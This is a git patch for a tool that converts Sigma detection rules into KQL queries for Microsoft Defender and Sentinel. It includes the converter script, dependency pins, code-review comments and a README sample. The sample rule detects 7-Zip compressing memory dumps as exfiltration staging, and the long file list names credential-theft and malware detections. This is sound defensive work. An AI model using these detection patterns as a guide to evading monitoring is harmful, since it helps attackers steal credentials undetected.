+    python helper.py -s ../sigma -o ../KQL-Rules
+    """
+)
+parser.add_argument(
+    '--sigma-dir', '-s',
+    type=str,
+    default='./sigma',
+    help='Path to the Sigma rules repository directory (default: ./sigma)'
+)
+parser.add_argument(
+    '--output-dir', '-o',
+    type=str,
+    default='./KQL',
+    help='Path to the output directory for KQL files (default: ./KQL)'
+)
+
+args = parser.parse_args()
+
+print("Starting Script")
+
+# Define Sigma rule folders to process
+SIGMA_BASE = os.path.abspath(args.sigma_dir)
+OUTPUT_BASE = os.path.abspath(args.output_dir)
+
+RULE_FOLDERS = [
+    "rules",
+    "rules-compliance",
+    "rules-dfir",
+    "rules-emerging-threats",
+    "rules-placeholder",
+    "rules-threat-hunting"
+]
+
+print(f"Sigma base path: {SIGMA_BASE}")
+print(f"Output base path: {OUTPUT_BASE}")
+print(f"Rule folders to process: {', '.join(RULE_FOLDERS)}")
+print("="*80)
+
+def convert_to_string(yaml_dict):
+    """Function converts yaml dict to string."""
+    # We change default style of strings to None (it's '>' in PyYAML)
+    # This means that PyYAML will choose style based on the data
+    yaml.SafeDumper.org_represent_str = yaml.SafeDumper.represent_str
+    def repr_str(dumper, data):
+        if '\n' in data:
+            return dumper.represent_scalar('tag:yaml.org,2002:str', data, style='|')
+        return dumper.org_represent_str(data)
+
yaml.add_representer(str, repr_str, Dumper=yaml.SafeDumper)
+
+    yaml_str = yaml.dump(yaml_dict, default_flow_style=False, Dumper=yaml.SafeDumper)
+    return yaml_str
+
+
+def extract_mitre_tactic(tags):
+    """Extract MITRE ATT&CK tactic from tags."""
+    # MITRE tactics mapping - using hyphens as that's what Sigma uses
+    tactics = {
+        'attack.reconnaissance': 'Reconnaissance',
+        'attack.resource-development': 'Resource Development',
+        'attack.resource_development': 'Resource Development',
+        'attack.initial-access': 'Initial Access',
+        'attack.initial_access': 'Initial Access',
+        'attack.execution': 'Execution',
+        'attack.persistence': 'Persistence',
+        'attack.privilege-escalation': 'Privilege Escalation',
+        'attack.privilege_escalation': 'Privilege Escalation',
+        'attack.defense-evasion': 'Defense Evasion',
+        'attack.defense_evasion': 'Defense Evasion',
+        'attack.credential-access': 'Credential Access',
+        'attack.credential_access': 'Credential Access',
+        'attack.discovery': 'Discovery',
+        'attack.lateral-movement': 'Lateral Movement',
+        'attack.lateral_movement': 'Lateral Movement',
+        'attack.collection': 'Collection',
+        'attack.command-and-control': 'Command and Control',
+        'attack.command_and_control': 'Command and Control',
+        'attack.exfiltration': 'Exfiltration',
+        'attack.impact': 'Impact'
+    }
+
+    if not tags:
+        return 'Uncategorized'
+
+    # Find the first matching tactic
+    for tag in tags:
+        tag_lower = tag.lower()
+        for tactic_key, tactic_name in tactics.items():
+            if tag_lower.startswith(tactic_key):
+                return tactic_name
+
+    return 'Uncategorized'
+
+
+# Overall Statistics
+TOTAL_SUCCESSFUL = 0
+TOTAL_FAILED = 0
+overall_stats = {}
+
+# Process each rule folder
+for rule_folder in RULE_FOLDERS:
+    print(f"\nProcessing: {rule_folder}")
+    print("-"*80)
+
+    # Get all YAML files from this rule folder
+    PATH = os.path.join(SIGMA_BASE, rule_folder)
+    file_pattern = os.path.join(PATH, '**', '*.yml')
+    file_list = glob.glob(file_pattern, recursive=True)
+
+    print(f"Found 
{len(file_list)} Sigma rule files in {rule_folder}")
+
+    if not file_list:
+        print(f"No files found in {rule_folder}, skipping...")
+        continue
+
+    # Statistics for this folder
+    SUCCESSFUL_CONVERSIONS = 0
+    FAILED_CONVERSIONS = 0
+    tactic_stats = {}
+
+    for idx, yml in enumerate(file_list, 1):
+        try:
+            with open(yml, encoding='utf-8') as yaml_file:
+                yaml_contents = load(yaml_file, Loader=SafeLoader)
+
+            # Define an example rule as a YAML str
+            sigma_rule = SigmaRule.from_yaml(convert_to_string(yaml_contents))
+
+            # Create backend with the pipeline
+            pipeline = microsoft_xdr_pipeline()
+            backend = KustoBackend(processing_pipeline=pipeline)
+
+            # Convert the rule
+            kql_query = backend.convert_rule(sigma_rule)[0]
+
+            # Get MITRE tactic from tags
+            tags = yaml_contents.get("tags", [])
+            TACTIC_FOLDER = extract_mitre_tactic(tags)
+
+            # Write the KQL query to a .kql file organized by tactic
+            BASE_OUTPUT_DIR = os.path.join(OUTPUT_BASE, rule_folder)
+            OUTPUT_DIR = os.path.join(BASE_OUTPUT_DIR, TACTIC_FOLDER)
+            os.makedirs(OUTPUT_DIR, exist_ok=True)
+
+            # Sanitize filename and convert to snake_case
+            SAFE_FILENAME = "".join(c if c.isalnum() or c in (' ', '_', '-') else '_' for c in sigma_rule.title)
+            # Convert to lowercase snake_case
+            SNAKE_CASE_FILENAME = SAFE_FILENAME.replace(' ', '_').replace('-', '_').lower()
+            # Remove multiple consecutive underscores
+            while '__' in SNAKE_CASE_FILENAME:
+                SNAKE_CASE_FILENAME = SNAKE_CASE_FILENAME.replace('__', '_')
+            output_file = os.path.join(OUTPUT_DIR, SNAKE_CASE_FILENAME + '.kql')
+
+            with open(output_file, 'w', encoding='utf-8') as kql_file:
+                # Write metadata as comments
+                kql_file.write(f'// Title: {sigma_rule.title}\n')
+                kql_file.write(f'// Author: {yaml_contents.get("author", "")}\n')
+                kql_file.write(f'// Date: {yaml_contents.get("date", "")}\n')
+                kql_file.write(f'// Level: {yaml_contents.get("level", "")}\n')
+                kql_file.write(f'// Description: {yaml_contents.get("description", "")}\n')
+                kql_file.write(f'// MITRE 
Tactic: {TACTIC_FOLDER}\n') + kql_file.write(f'// Tags: {", ".join(tags) if tags else ""}\n') + + # Write false positives if present + false_positives = yaml_contents.get("falsepositives", []) + if false_positives: + # Filter out empty or "unknown" entries + valid_fps = [str(fp).strip() for fp in false_positives + if fp and str(fp).strip() and str(fp).strip().lower() != 'unknown'] + if valid_fps: + kql_file.write('// False Positives:\n') + for fp_str in valid_fps: + kql_file.write(f'// - {fp_str}\n') + + kql_file.write('\n') + # Write the actual KQL query + kql_file.write(kql_query) + + SUCCESSFUL_CONVERSIONS += 1 + # Track by tactic + tactic_stats[TACTIC_FOLDER] = tactic_stats.get(TACTIC_FOLDER, 0) + 1 + + if SUCCESSFUL_CONVERSIONS % 10 == 0: + print(f"[{idx}/{len(file_list)}] {rule_folder}: Converted: {SUCCESSFUL_CONVERSIONS}") + print(f"Failed: {FAILED_CONVERSIONS}") + + except Exception as e: + FAILED_CONVERSIONS += 1 + rule_name = yaml_contents.get('title', os.path.basename(yml)) if 'yaml_contents' in locals() else os.path.basename(yml) + if FAILED_CONVERSIONS <= 5: # Only show first 5 errors in detail + print(f"[{idx}/{len(file_list)}] {rule_name} - Error: {str(e)[:100]}") + # Continue to next file # Print statistics for this folder + print(f"\n{rule_folder} Summary:") + print(f" Successful: {SUCCESSFUL_CONVERSIONS}") + print(f" Failed: {FAILED_CONVERSIONS}") + if tactic_stats: + print(f" Tactics covered: {len(tactic_stats)}") + + # Update overall statistics + TOTAL_SUCCESSFUL += SUCCESSFUL_CONVERSIONS + TOTAL_FAILED += FAILED_CONVERSIONS + + # Merge tactic stats + for tactic, count in tactic_stats.items(): + folder_key = f"{rule_folder}/{tactic}" + overall_stats[folder_key] = count + +# Print final statistics +print("\n" + "="*80) +print("OVERALL CONVERSION COMPLETE!") +print("="*80) +print(f"Total files processed: {TOTAL_SUCCESSFUL + TOTAL_FAILED}") +print(f"Total successful conversions: {TOTAL_SUCCESSFUL}") +print(f"Total failed conversions: 
{TOTAL_FAILED}") +print(f"\nOutput base directory: {OUTPUT_BASE}") +print("\nFolder structure created:") +for rule_folder in RULE_FOLDERS: + folder_path = os.path.join(OUTPUT_BASE, rule_folder) + if os.path.exists(folder_path): + print(f" {rule_folder}/") diff --git a/requirements.txt b/requirements.txt new file mode 100644 index 00000000..d28a44be --- /dev/null +++ b/requirements.txt @@ -0,0 +1,15 @@ +certifi==2025.11.12 +charset-normalizer==3.4.4 +idna==3.11 +Jinja2==3.1.6 +MarkupSafe==3.0.3 +packaging==24.2 +pyaml==25.7.0 +pyparsing==3.2.5 +pySigma==0.11.23 +pySigma-backend-kusto==0.4.4 +pySigma-backend-microsoft365defender==0.3.2 +PyYAML==6.0.3 +requests==2.32.5 +sigma==0.0.1 +urllib3==2.5.0 From 356a11001569e7d6eeb748b4a83fcfc2665f67c5 Mon Sep 17 00:00:00 2001 From: Kaiber_wsl_desktop Date: Sat, 15 Nov 2025 17:43:29 +1100 Subject: [PATCH 02/17] Updated readme with disclaimer and sample sigma to kql conversion. --- README.md | 45 +++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 45 insertions(+) diff --git a/README.md b/README.md index f9bf000a..3a738095 100644 --- a/README.md +++ b/README.md @@ -1,6 +1,8 @@ # Sigma2KQL - Working as of 15/11/2025 Sigma Queries turned into KQL for Defender and Microsoft Snetinel using [pysigma-backend-KQL-backend](https://github.com/AttackIQ/pySigma-backend-kusto/tree/main) +__Disclaimer: Not all of these rules have been validated either to ensure KQL is functional or if they are an exact replica of the Sigma rule. The script was created with the assumption that the pySigma Kusto backend does what it is meant to do.__ + ``` ├───rules │ └───KQL 
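Review bot: Two Sigma rules in the same tactic folder whose titles differ only in case or punctuation reduce to the same `SNAKE_CASE_FILENAME`, and the later one silently replaces the earlier at `open(output_file, 'w', encoding='utf-8')` while both are still counted in `SUCCESSFUL_CONVERSIONS`, so a detection can vanish from the output tree unnoticed; guard the write with `if os.path.exists(output_file): raise FileExistsError(f"output name collision for rule {yaml_contents.get('id')}: {output_file}")` so it lands in the `except` branch, or fold the Sigma `id` into the file name. In that `except` branch, `'yaml_contents' in locals()` is true from the second file onwards, so a rule that fails to parse is reported under the previous rule's title — set `yaml_contents = None` at the top of the loop body and test for `None` instead. The script also exits 0 regardless of `TOTAL_FAILED` and prints only the first five errors per folder (truncated to `str(e)[:100]`), so a Detection-as-Code pipeline, which the README presents as the intended use, cannot tell that hundreds of rules were dropped; finish with `sys.exit(1 if TOTAL_FAILED else 0)` (adding `import sys`) and write the failed rule paths with their full error to a file. Finally, the header comments carry no Sigma `id` or `modified` date, so a generated `.kql` cannot be traced back to the exact rule revision it came from; add `kql_file.write(f'// ID: {yaml_contents.get("id", "")}\n')` beside the existing `// Title:` line.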
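Review bot: `sigma==0.0.1` and `pySigma-backend-microsoft365defender==0.3.2` are pinned here but nothing in helper.py uses them — it imports `sigma.backends.kusto` and `sigma.pipelines.microsoftxdr`, which are provided by `pySigma-backend-kusto`, and the `sigma` distribution does not appear to be related to pySigma at all (the `sigma` import namespace comes from the `pySigma` package); installing an unrelated package that may claim the same top-level module name into a detection pipeline is an avoidable supply-chain risk, so drop both lines and regenerate the file from a clean virtual environment. Since the README positions this as Detection-as-Code input, consider pinning with hashes (for example `pip-compile --generate-hashes`) and installing with `pip install --require-hashes -r requirements.txt` so a substituted wheel fails the build rather than silently running during conversion.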
@@ -86,6 +88,49 @@ Folder structure created: ### Sample Rule: +**Sigma Rule:** +``` +title: 7Zip Compressing Dump Files +id: ec570e53-4c76-45a9-804d-dc3f355ff7a7 +related: + - id: 1ac14d38-3dfc-4635-92c7-e3fd1c5f5bfc + type: derived +status: test +description: Detects execution of 7z in order to compress a file with a ".dmp"/".dump" extension, which could be a step in a process of dump file exfiltration. +references: + - https://thedfirreport.com/2022/09/26/bumblebee-round-two/ +author: Nasreddine Bencherchali (Nextron Systems) +date: 2022-09-27 +modified: 2023-09-12 +tags: + - attack.collection + - attack.t1560.001 +logsource: + category: process_creation + product: windows +detection: + selection_img: + - Description|contains: '7-Zip' + - Image|endswith: + - '\7z.exe' + - '\7zr.exe' + - '\7za.exe' + - OriginalFileName: + - '7z.exe' + - '7za.exe' + selection_extension: + CommandLine|contains: + - '.dmp' + - '.dump' + - '.hdmp' + condition: all of selection_* +falsepositives: + - Legitimate use of 7z with a command line in which ".dmp" or ".dump" appears accidentally + - Legitimate use of 7z to compress WER ".dmp" files for troubleshooting +level: medium +``` + +**KQL Rule:** ``` // Title: 7Zip Compressing Dump Files // Author: Nasreddine Bencherchali (Nextron Systems) From 415ccac9e5f476ff4b09597f2a4f5f294a648857 Mon Sep 17 00:00:00 2001 
From: Kaiber_wsl_desktop Date: Sat, 15 Nov 2025 18:10:10 +1100 Subject: [PATCH 03/17] Better multi-line description handling for the helper script and updated the rules repo to match the current state of the helper script. --- ..._exe_file_creation_by_uncommon_process.kql | 7 +++--- ...eamer_rat_loading_net_executable_image.kql | 1 - ...ulnerability_cve_2025_33053_image_load.kql | 5 ++-- .../potential_pikabot_c2_activity.kql | 3 +-- ..._file_potential_cve_2025_24054_exploit.kql | 3 +-- ...t_apt_scheduled_task_creation_registry.kql | 1 - .../flowcloud_registry_markers.kql | 3 +-- ...st_blizzard_apt_file_creation_activity.kql | 3 +-- ...t_javascript_constrained_file_creation.kql | 3 +-- ...blizzard_apt_process_creation_activity.kql | 3 +-- ...ka_backdoor_execution_via_rundll32_exe.kql | 1 - ...l_extension_execution_via_rundll32_exe.kql | 1 - ...al_kapeka_decrypted_backdoor_indicator.kql | 3 +-- ...cious_command_combinations_via_cmd_exe.kql | 5 ++-- ...raspberry_robin_cpl_execution_activity.kql | 3 +-- ...t_slashandgrab_exploitation_indicators.kql | 1 - .../potential_pikabot_discovery_activity.kql | 3 +-- .../cve_2021_26858_exchange_exploitation.kql | 5 ++-- ...icious_confluence_child_process_linux_.kql | 1 - ...ious_confluence_child_process_windows_.kql | 1 - ...kgate_autoit3_exe_execution_parameters.kql | 5 ++-- .../emotet_loader_execution_via_lnk_file.kql | 3 +-- ...25_59287_wsus_suspicious_child_process.kql | 3 +-- .../file_creation_related_to_rat_clients.kql | 1 - ...apeka_backdoor_loaded_via_rundll32_exe.kql | 3 +-- .../Execution/katz_stealer_dll_loaded.kql | 5 ++-- ...tential_apt_fin7_exploitation_activity.kql | 3 +-- ...space_one_access_remote_code_execution.kql | 3 +-- ...al_cve_2022_29072_exploitation_attempt.kql | 5 ++-- ...ect_os_command_injection_file_creation.kql | 3 +-- ...2024_3094_suspicious_ssh_child_process.kql | 1 - ...uspicious_creation_of_esx_admins_group.kql | 5 ++-- ...kabot_activity_lure_document_execution.kql | 3 +-- 
...tation_dynamic_compilation_via_csc_exe.kql | 10 +++----- ...ential_sap_netweaver_webshell_creation.kql | 3 +-- ..._sap_netweaver_webshell_creation_linux.kql | 3 +-- ...snif_redirection_of_discovery_commands.kql | 1 - ..._authentication_bypass_cve_2025_57791_.kql | 3 +-- ...e_2024_50623_exploitation_attempt_cleo.kql | 1 - ...28_exploitation_attempt_vmware_horizon.kql | 1 - ...tation_of_goanywhere_mft_vulnerability.kql | 3 +-- ...ve_2025_53770_exploitation_file_create.kql | 3 +-- ...cve_2025_53770_exploitation_indicators.kql | 3 +-- .../suspicious_crushftp_child_process.kql | 5 ++-- .../blackbyte_ransomware_registry.kql | 5 ++-- ...raversal_webshell_drop_cve_2025_57790_.kql | 3 +-- ..._suspicious_new_printer_ports_registry.kql | 3 +-- ...eenconnect_path_traversal_exploitation.kql | 1 - ...eka_backdoor_configuration_persistence.kql | 3 +-- ...coldsteel_persistence_service_dll_load.kql | 1 - ...tivity_shutdown_schedule_task_creation.kql | 3 +-- ...al_notepad_cve_2025_49144_exploitation.kql | 5 ++-- ...registry_set_internet_settings_zonemap.kql | 3 +-- ...reenconnect_user_database_modification.kql | 3 +-- ..._spawned_by_centrestack_portal_apppool.kql | 1 - ...spooler_service_suspicious_binary_load.kql | 1 - ...user_and_guid_password_cve_2025_57788_.kql | 3 +-- ...d_apt_custom_protocol_handler_creation.kql | 3 +-- ...stom_protocol_handler_dll_registry_set.kql | 3 +-- ...ss_spawning_rundll32_guloader_activity.kql | 3 +-- .../kapeka_backdoor_persistence_activity.kql | 9 ++++--- ...vity_execution_of_more_com_and_vbc_exe.kql | 5 ++-- ..._potential_cve_2025_32463_exploitation.kql | 7 +++--- ...l_cve_2024_35250_exploitation_activity.kql | 1 - ...ot_activity_winlogon_shell_persistence.kql | 1 - .../potential_pikabot_hollowing_activity.kql | 3 +-- ...r_payload_execution_via_scheduled_task.kql | 5 ++-- .../clipboard_data_collection_via_pbpaste.kql | 9 ++++--- ...ion_initiated_from_users_public_folder.kql | 5 ++-- ...suspicious_azure_front_door_connection.kql | 3 +-- 
...ary_code_execution_and_remote_sessions.kql | 24 +++++++------------ ...e_code_tunnel_execution_file_indicator.kql | 1 - ...dential_files_by_uncommon_applications.kql | 5 ++-- ...nsitive_files_by_uncommon_applications.kql | 3 +-- ..._loaded_by_uncommon_suspicious_process.kql | 7 +++--- ...og_query_requests_by_builtin_utilities.kql | 1 - .../Credential Access/pfx_file_creation.kql | 13 ++++------ .../unattend_xml_file_access_attempt.kql | 3 +-- ...ok_mail_files_by_uncommon_applications.kql | 5 ++-- ...tsproxy_dll_loaded_by_uncommon_process.kql | 3 +-- .../codepage_modification_via_mode_com.kql | 3 +-- .../diskshadow_script_mode_execution.kql | 1 - ...ork_connection_to_non_local_ip_address.kql | 5 ++-- ...dless_process_launched_via_conhost_exe.kql | 3 +-- ..._exe_initiated_http_network_connection.kql | 1 - ..._the_cryptography_powershell_namespace.kql | 5 ++-- .../microsoft_workflow_compiler_execution.kql | 1 - ...initiated_network_connection_over_http.kql | 5 ++-- ...cting_package_created_via_iexpress_exe.kql | 5 ++-- ...e_added_via_new_netfirewallrule_cmdlet.kql | 1 - ...e_obfuscation_using_unicode_characters.kql | 3 +-- ...sideloading_activity_via_extexport_exe.kql | 5 ++-- ...on_via_explorer_exe_from_shell_process.kql | 7 +++--- ..._execution_from_guid_like_folder_names.kql | 3 +-- ..._the_cryptography_powershell_namespace.kql | 5 ++-- ...isterserver_export_function_explicitly.kql | 1 - ...rvice_binary_in_user_controlled_folder.kql | 7 +++--- .../use_short_name_path_in_command_line.kql | 13 +++++----- ..._file_creation_in_codeintegrity_folder.kql | 1 - .../Discovery/cmd_shell_output_redirect.kql | 3 +-- .../Discovery/process_discovery.kql | 3 +-- ...tem_information_discovery_via_wmic_exe.kql | 5 ++-- .../arbitrary_command_execution_using_wsl.kql | 1 - .../cab_file_extraction_via_wusa_exe.kql | 1 - ...d_executed_via_run_dialog_box_registry.kql | 3 +-- ..._of_script_inside_of_a_compressed_file.kql | 13 ++++------ .../microsoft_word_add_in_loaded.kql | 1 - 
...ection_initiated_by_powershell_process.kql | 5 ++-- ...tware_execution_uc_berkeley_signature_.kql | 3 +-- ...l_file_override_append_via_set_command.kql | 7 +++--- ..._suspicious_powershell_child_processes.kql | 3 +-- .../process_execution_from_webdav_share.kql | 5 ++-- ...path_configuration_file_creation_linux.kql | 5 ++-- ...path_configuration_file_creation_macos.kql | 5 ++-- ...th_configuration_file_creation_windows.kql | 5 ++-- ...s_tool_cmd_exe_execution_via_anyviewer.kql | 1 - ...nnect_remote_command_execution_hunting.kql | 3 +-- ...m_potential_suspicious_parent_location.kql | 3 +-- ...s_new_instance_of_an_office_com_object.kql | 3 +-- .../process_terminated_via_taskkill.kql | 3 +-- .../execution_from_webserver_root_folder.kql | 1 - ...ted_in_potentially_suspicious_location.kql | 5 ++-- .../elevated_system_shell_spawned.kql | 1 - ...kerberos_coercion_via_dns_spn_spoofing.kql | 13 +++++----- .../clipboard_collection_with_xclip_tool.kql | 3 +-- .../compressed_file_creation_via_tar_exe.kql | 3 +-- ...compressed_file_extraction_via_tar_exe.kql | 3 +-- ...ous_output_via_compress_archive_cmdlet.kql | 3 +-- ...ckup_for_system_registry_hives_enabled.kql | 3 +-- ...ed_disableaidataanalysis_value_deleted.kql | 5 ++-- ...indows_recall_feature_enabled_registry.kql | 5 ++-- ...ows_recall_feature_enabled_via_reg_exe.kql | 7 +++--- .../anydesk_temporary_artefact.kql | 5 ++-- .../cloudflared_portable_execution.kql | 1 - .../cloudflared_quick_tunnel_execution.kql | 5 ++-- ...localtonet_tunneling_service_initiated.kql | 5 ++-- ...onet_tunneling_service_initiated_linux.kql | 5 ++-- .../finger_exe_execution.kql | 5 ++-- ...assist_temporary_installation_artefact.kql | 5 ++-- ...interchange_format_file_via_ldifde_exe.kql | 1 - ...ection_initiated_by_script_interpreter.kql | 1 - ...vestandaloneupdater_exe_proxy_download.kql | 3 +-- ...k_connection_initiated_by_imewdbld_exe.kql | 1 - ...tially_suspicious_or_uncommon_location.kql | 1 - ...urewebsites_net_by_non_browser_process.kql 
| 1 - ...to_potential_dead_drop_resolver_domain.kql | 3 +-- .../potentially_suspicious_usage_of_qemu.kql | 3 +-- .../pua_ngrok_execution.kql | 3 +-- .../quickassist_execution.kql | 1 - .../remote_access_tool_anydesk_execution.kql | 5 ++-- ...ydesk_execution_from_suspicious_folder.kql | 5 ++-- ...emote_access_tool_gotoassist_execution.kql | 5 ++-- .../remote_access_tool_logmein_execution.kql | 5 ++-- ...gent_command_execution_via_meshcentral.kql | 3 +-- ...emote_access_tool_netsupport_execution.kql | 5 ++-- ...ol_potential_meshagent_execution_macos.kql | 5 ++-- ..._potential_meshagent_execution_windows.kql | 5 ++-- ...tool_renamed_meshagent_execution_macos.kql | 5 ++-- ...ol_renamed_meshagent_execution_windows.kql | 5 ++-- ...te_access_tool_screenconnect_execution.kql | 5 ++-- ...al_suspicious_remote_command_execution.kql | 1 - ...mote_access_tool_simple_help_execution.kql | 5 ++-- ...potentially_attacker_controlled_server.kql | 5 ++-- ...mote_access_tool_ultraviewer_execution.kql | 5 ++-- ...e_code_tunnel_execution_file_indicator.kql | 1 - ...onnect_temporary_installation_artefact.kql | 5 ++-- .../suspicious_binary_writes_via_anydesk.kql | 5 ++-- ...suspicious_certreq_command_to_download.kql | 5 ++-- ..._network_communication_with_google_api.kql | 1 - ...k_connection_initiated_by_certutil_exe.kql | 3 +-- ...tudio_code_tunnel_remote_file_creation.kql | 1 - ...rency_wallets_by_uncommon_applications.kql | 3 +-- ..._history_file_by_uncommon_applications.kql | 3 +-- ...i_master_keys_by_uncommon_applications.kql | 3 +-- ...anager_access_by_uncommon_applications.kql | 3 +-- ...ys_and_certificate_export_activity_ioc.kql | 1 - ...numeration_for_credentials_in_registry.kql | 5 ++-- ...ccess_of_signal_desktop_sensitive_data.kql | 7 +++--- .../hacktool_lazagne_execution.kql | 3 +-- .../hacktool_remotekrbrelay_execution.kql | 1 - .../hacktool_winpwn_execution.kql | 1 - ...resting_service_enumeration_via_sc_exe.kql | 3 +-- ...ed_module_enumeration_via_tasklist_exe.kql | 5 ++-- 
.../lsass_dump_keyword_in_commandline.kql | 1 - ...e_file_access_by_uncommon_applications.kql | 1 - ...neric_credentials_added_via_cmdkey_exe.kql | 3 +-- ...uration_reconnaissance_via_findstr_exe.kql | 3 +-- .../potential_browser_data_stealing.kql | 5 ++-- ..._sniffing_activity_using_network_tools.kql | 5 ++-- ...istory_access_attempt_via_history_file.kql | 3 +-- ...fender_av_bypass_via_dump64_exe_rename.kql | 3 +-- ...ommand_targeting_teams_sensitive_files.kql | 3 +-- ...con_activity_using_log_query_utilities.kql | 3 +-- ...ly_suspicious_jwt_token_search_via_cli.kql | 5 ++-- ...stry_export_of_third_party_credentials.kql | 3 +-- .../sensitive_file_dump_via_wbadmin_exe.kql | 3 +-- ...e_recovery_from_backup_via_wbadmin_exe.kql | 3 +-- ...e_access_to_browser_credential_storage.kql | 5 ++-- ...p_file_created_by_uncommon_application.kql | 1 - ...add_insecure_download_source_to_winget.kql | 3 +-- ...river_disallowed_on_dev_drive_registry.kql | 1 - ...bitrary_file_download_via_squirrel_exe.kql | 1 - .../audit_policy_tampering_via_auditpol.kql | 3 +-- ...tampering_via_nt_resource_kit_auditpol.kql | 3 +-- .../audit_rules_deleted_via_auditctl.kql | 5 ++-- .../baaupdate_exe_suspicious_dll_load.kql | 5 ++-- ...cial_processes_with_improper_arguments.kql | 5 ++-- .../bitlockertogo_exe_execution.kql | 7 +++--- ...ation_via_mode_com_to_russian_language.kql | 3 +-- .../com_object_execution_via_xwizard_exe.kql | 3 +-- .../creation_of_non_existent_system_dll.kql | 3 +-- .../devicecredentialdeployment_execution.kql | 1 - .../directory_removal_via_rmdir.kql | 7 +++--- ...ore_mode_dsrm_registry_value_tampering.kql | 11 ++++----- ...der_wmi_autologger_session_via_reg_exe.kql | 5 ++-- ...de_uncommon_script_extension_execution.kql | 3 +-- ...splaying_hidden_files_feature_disabled.kql | 3 +-- .../dll_sideloading_of_shellchromeapi_dll.kql | 3 +-- ..._to_disallowed_images_in_hvci_registry.kql | 1 - .../dynamic_csharp_compile_artefact.kql | 5 ++-- ...amper_in_net_processes_via_commandline.kql 
| 3 +-- .../etw_trace_evasion_activity.kql | 1 - .../evtx_created_in_uncommon_location.kql | 5 ++-- ...tion_of_suspicious_file_type_extension.kql | 3 +-- .../explorer_process_tree_break.kql | 3 +-- .../Defense Evasion/file_deletion_via_del.kql | 7 +++--- ...ile_download_using_protocolhandler_exe.kql | 1 - .../file_download_via_installutil_exe.kql | 1 - ...stem_dll_name_in_unsuspected_locations.kql | 3 +-- ..._process_name_in_unsuspected_locations.kql | 3 +-- ...orfiles_exe_child_process_masquerading.kql | 1 - .../fsutil_suspicious_invocation.kql | 3 +-- .../hacktool_edrsilencer_execution.kql | 1 - ...et_on_file_directory_via_chflags_macos.kql | 3 +-- ...e_schedule_task_via_index_value_tamper.kql | 3 +-- ...ecialaccounts_registry_key_commandline.kql | 1 - ...visor_enforced_code_integrity_disabled.kql | 1 - ...r_enforced_paging_translation_disabled.kql | 1 - ..._to_mycomputer_zone_for_http_protocols.kql | 1 - ...log_deletion_via_commandline_utilities.kql | 3 +-- ...xecution_from_script_file_via_bash_exe.kql | 3 +-- ..._inline_command_execution_via_bash_exe.kql | 3 +-- ...itive_subfolder_search_via_findstr_exe.kql | 1 - ..._new_package_via_winget_local_manifest.kql | 5 ++-- ...lorer_disablefirstruncustomize_enabled.kql | 1 - .../jscript_compiler_execution.kql | 3 +-- ...ol_binary_copied_from_system_directory.kql | 1 - ...on_by_microsoft_visual_studio_debugger.kql | 5 ++-- ...nents_file_execution_by_taef_detection.kql | 3 +-- .../maxmpxct_registry_value_changed.kql | 5 ++-- .../msdt_execution_via_answer_file.kql | 1 - ...cution_with_suspicious_file_extensions.kql | 7 +++--- ...ll_runhtmlapplication_suspicious_usage.kql | 1 - .../msiexec_quiet_installation.kql | 3 +-- .../Defense Evasion/msxsl_exe_execution.kql | 3 +-- ..._connection_initiated_by_addinutil_exe.kql | 3 +-- ...capture_session_launched_via_dxcap_exe.kql | 1 - ..._certificate_installed_via_certmgr_exe.kql | 3 +-- ...certificate_installed_via_certutil_exe.kql | 3 +-- 
...l_msi_install_via_windowsinstaller_com.kql | 9 ++++--- ...xecution_of_malicious_embedded_scripts.kql | 3 +-- ...work_connection_initiated_by_cmstp_exe.kql | 3 +-- .../pdf_file_created_by_regedit_exe.kql | 3 +-- ...cation_whitelisting_bypass_via_dnx_exe.kql | 3 +-- .../potential_base64_decoded_from_images.kql | 1 - ...icode_characters_from_suspicious_image.kql | 3 +-- ...nse_evasion_via_right_to_left_override.kql | 3 +-- ...al_fake_instance_of_hxtsr_exe_executed.kql | 5 ++-- ...d_via_ms_appinstaller_protocol_handler.kql | 3 +-- ...ation_via_ntfs_index_allocation_stream.kql | 1 - ...n_via_ntfs_index_allocation_stream_cli.kql | 1 - ...lyph_attack_using_lookalike_characters.kql | 5 ++-- ...using_lookalike_characters_in_filename.kql | 5 ++-- ...ential_lsass_process_dump_via_procdump.kql | 7 +++--- ..._pendingfilerenameoperations_tampering.kql | 1 - ...tial_persistence_via_outlook_home_page.kql | 3 +-- ...ial_persistence_via_outlook_today_page.kql | 3 +-- ...potential_powershell_execution_via_dll.kql | 3 +-- ...potential_suspicious_mofcomp_execution.kql | 5 ++-- ...s_windows_feature_enabled_proccreation.kql | 3 +-- ...y_suspicious_cmd_shell_output_redirect.kql | 3 +-- ...n_from_parent_process_in_public_folder.kql | 1 - ...spicious_ping_copy_command_combination.kql | 1 - ...ous_rundll32_exe_execution_of_udl_file.kql | 3 +-- ...y_suspicious_wdac_policy_file_creation.kql | 1 - ..._suspicious_wuauclt_network_connection.kql | 3 +-- ...fault_action_set_to_allow_or_noaction_.kql | 5 ++-- ...executed_from_headless_conhost_process.kql | 3 +-- .../process_memory_dump_via_dotnet_dump.kql | 1 - ...ocess_proxy_execution_via_squirrel_exe.kql | 1 - .../proxy_execution_via_vshadow.kql | 5 ++-- .../pua_process_hacker_execution.kql | 5 ++-- ...ion_security_warning_disabled_in_excel.kql | 3 +-- ...ity_warning_disabled_in_excel_registry.kql | 3 +-- ...ython_image_load_by_non_python_process.kql | 5 ++-- .../rdp_sensitive_settings_changed.kql | 3 +-- 
...rdp_sensitive_settings_changed_to_zero.kql | 3 +-- ...ion_without_commandline_flags_or_files.kql | 3 +-- .../remote_file_download_via_findstr_exe.kql | 1 - .../remove_scheduled_cron_task_job.kql | 3 +-- .../renamed_procdump_execution.kql | 3 +-- .../runmru_registry_key_deletion.kql | 5 ++-- .../runmru_registry_key_deletion_registry.kql | 5 ++-- ...e_from_potentially_suspicious_location.kql | 3 +-- ...ted_in_potentially_suspicious_location.kql | 5 ++-- ...files_as_system_files_using_attrib_exe.kql | 1 - ..._access_agent_update_utility_execution.kql | 3 +-- .../suspicious_calculator_usage.kql | 1 - ...cious_copy_from_or_to_system_directory.kql | 3 +-- .../suspicious_customshellhost_execution.kql | 1 - ...aring_or_configuration_change_activity.kql | 3 +-- .../suspicious_executable_file_creation.kql | 3 +-- ...ious_lnk_double_extension_file_created.kql | 1 - ...spicious_msiexec_execute_arbitrary_dll.kql | 3 +-- ...eyboard_layout_ime_file_registry_value.kql | 5 ++-- ...us_process_masquerading_as_svchost_exe.kql | 3 +-- ..._via_werfaultsecure_through_edr_freeze.kql | 1 - ...ous_procexp152_sys_file_created_in_tmp.kql | 3 +-- .../suspicious_service_installed.kql | 3 +-- 